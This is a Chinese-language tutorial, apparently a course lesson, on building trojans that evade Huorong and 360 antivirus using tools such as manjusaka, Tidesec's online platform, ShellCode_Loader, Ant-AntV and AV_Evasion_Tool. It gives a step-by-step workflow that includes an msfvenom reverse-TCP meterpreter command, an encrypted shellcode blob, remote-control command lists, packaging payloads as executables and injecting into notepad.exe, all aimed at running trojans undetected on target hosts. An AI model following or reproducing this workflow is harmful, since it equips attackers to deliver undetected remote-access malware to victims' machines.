木马免杀之各类免杀工具的使用

各类免杀工具的使用

课程目标

  1. 了解前边学到的免杀原理在工具中的应用
  2. 运用前边所学的免杀原理结合免杀的工具进行针对火绒和360的免杀
    我们平时在制作msf的木马时,如果直接放到目标机器上进行运行,可能会有火绒、360等杀毒软件进行拦截,阻止我们的木马执行。为了让我们的目标主机可以顺利执行我们的木马程序,在了解了免杀的原理之后,我们再来学习几个简单的工具

教材内容

一、常用的几个免杀工具
1、web界面远控 manjusaka

项目地址:https://github.com/YDHCUI/manjusaka

manjusaka 是一个基于web界面的仿 cobalt strike 做出的远控,生成的exe木马具有一定的免杀功效。

我们在centos7上搭建服务端,来供我们的客户端进行访问

yum -y install lrzsz unzip

直接下载安装包并上传到我们的centos7服务器上,上传成功后解压并执行

unzip manjusaka-main.zip 
cd manjusaka-main
chmod +x manjusaka

image-20230323175711725

执行成功后找到登陆界面的账号和密码,即可访问管理界面进行登陆

http://192.168.15.44:3200/manjusaka
用户名:manjusaka 密码:czcfrVutLmyc

image-20230324092705662

登陆成功后就是manjusaka的主页,里边显示我们上线的主机和可以执行的操作

image-20230324092742250

在目标设定中生成我们需要执行的木马程序

image-20230324093156277

点击生成NPC,就可以对木马程序的连接进行设置

设置回调的地址是我们服务器地址的80端口,加密的密钥随意,类型选择exe即可,同样这个可以对linux的系统进行主机上线

image-20230324094318786

点击下载之后就可以上传到目标主机进行执行

image-20230324094929373

可以躲避火绒和360的静态查杀

image-20230324094815965

可以执行的命令列表如下

help      打印帮助 
ps        查看进程 
ss        查看网络连接 
ls        枚举文件 
cd        切换目录
sh        执行系统命令 
cat       读取文本 
screen    执行截屏 
wget      下载文件
put       上传文件                        
inject    注入进程

可以执行系统命令或者查看当前进程

image-20230324095307412

image-20230324095517479

2、潮汐在线免杀平台

项目地址:http://bypass.tidesec.com/

潮汐免杀平台只需要我们上传shellcode就可以对上传的shellcode进行处理,编译成exe文件。打开我们的项目地址

image-20230324103543021

输入msf生成的shellcode。选择加密方式、密码和系统,用python的加载器生成

image-20230324104225450

生成成功后直接下载即可

image-20230324104306500

所有的在线平台的弊端就是时效性,因为是公开的所以免杀的效果会慢慢变差,可以自己找一些其他的在线网站进行免杀处理,潮汐平台目前不免杀

3. shellcode_loader

项目地址:https://github.com/Axx8/ShellCode_Loader

使用加密算法对shellcode 进行加密,但是因为是公开的项目,所以这些项目我们以学习项目思路为主

将项目下载下来,执行shellcode_encryption.exe shellcode.c ,即可生成一段密文shellcode

image-20230324105515374

然后将密文放进python文件的加载器,使用pyinstaller打包即可

JM0xIG55bjVQOtA39su1QyLxkEWo/MM8SiW6xpXoOxapgRZ6XGjeEUVGiOcXVdyeGQBsosEfKVmjVS/+X++XC+DeVEn3t2RNru44g6ren6wl9P5jwJTDH/iBH71RtwUkKQ0qjW5SihBXY0dCkByTnmuqR8hJyKwbUK10M5PJ8O04PsqVVj8bDlyP18emPc0Xb8MhPQBjv3+c9ipkQalwTrY9MtnzI0uIJYwWDtQAkqqSe1sPCgcTMXXkCvJDr5Bj7WNWPoBlkZCpnghfd2qWzgRkfj4YwyztswJDOE6dfi+nhjLKAhkeOKq+Dqzp74TuXpEWvSg3lQw5zDueUtzUTikVubJTGOL1vWfuoAxXrFJYkvaGG1tA1U6FNUTXKP9STh4GPZDTw7d+ex6JgA6+946rrcBQEIATg0jzdzisuGhj3mTauNmghjn14ELudYhvFQmRgv6jXjdtzrsJAf6/oZaTTHe5DgNvApvN9wxpeGLmVTPyxfDV0sBgSVGRhdSXkhYNQ1+p+5wV9svj5yI1lAE3K/ogpSTwvzWpSU74yk/O1BHHoo8C0NwaXvUJhoLgKq4wgseH30F/xIz1RIe0Esq71mbCjfN+vYPE0qRmwHS0hka7VEPNNVOOPHv8xbjEgdFYO+7qmUcf8QrdG2j8R0SQuclZkcDTUIwOHFOmbgOrtI+i4tS3rTkVNxKI5mDMykQR7uzH5qOXd1rt6o6oE2V9EZHuE9ekKZuSqXgkF9o5traWguBG9AzA4CHTqqjs8PBxt3ipeUeXFdgWN8f043p1njcP2Ku62rT7blqKOl2Zy0fWbPn7FJ0Iw5BDldJ8oaLnOm8vp1AD5HoOQ+RQCDXx4I/JOm80T2VfXPKHElIfQwUyie+QU7jV/Cyi47tsGzvUch1zdrInzSpTdxu2xg==

生成exe文件不免杀,但是过程中使用的AES加密算法的python加载器值得学习

4.Ant-AntV

项目地址:https://github.com/shellfeel/Ant-AntV

是一个实战使用过的免杀工具,在处理shellcode的时候免杀的效果较好,使用pyinstaller的加载器进行加载。

使用msf生成二进制文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.15.13 LPORT=6666 -f raw -o shellcode.bin

进入到项目后执行

pip install -r requirements.txt

安装依赖库,将msf生成的二进制文件shellcode.bin移动到bean_raw下,重命名为beacon.bin,之后执行命令打包成exe文件即可

python gen_trojan.py

对火绒和360均静态免杀

image-20230324103248450

5. 掩日

项目地址:https://github.com/1y0n/AV_Evasion_Tool

掩日是适用于红队的综合免杀工具,在安装环境依赖之后即可使用生成的shellcode生成免杀的木马程序

首先安装tdm-gcc和64位go语言环境

// tdm-gcc安装
https://github.com/jmeubank/tdm-gcc/releases/download/v9.2.0-tdm64-1/tdm64-gcc-9.2.0.exe
// go语言环境安装
https://go.dev/dl/go1.17.8.windows-amd64.msi

然后打开掩日即可

image-20230324111003639

以通用免杀和进程注入为例,使用生成的shellcode.c生成木马文件,加密算法选择默认的栅栏,注入进程为notepad.exe

image-20230324111427972

可以过火绒和360的静态查杀和火绒的动态查杀

课程小结

通过本节的课程,我们可以看到不管是别人开发的远控生成的木马文件,还是在线的免杀平台,还是一些公开的免杀项目,我们都可以使用这些工具对msf生成的shellcode进行处理,达到免杀的效果,工具处理过程中的思路我们也可以借助开源代码进行学习,丰富我们对于免杀的理解

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值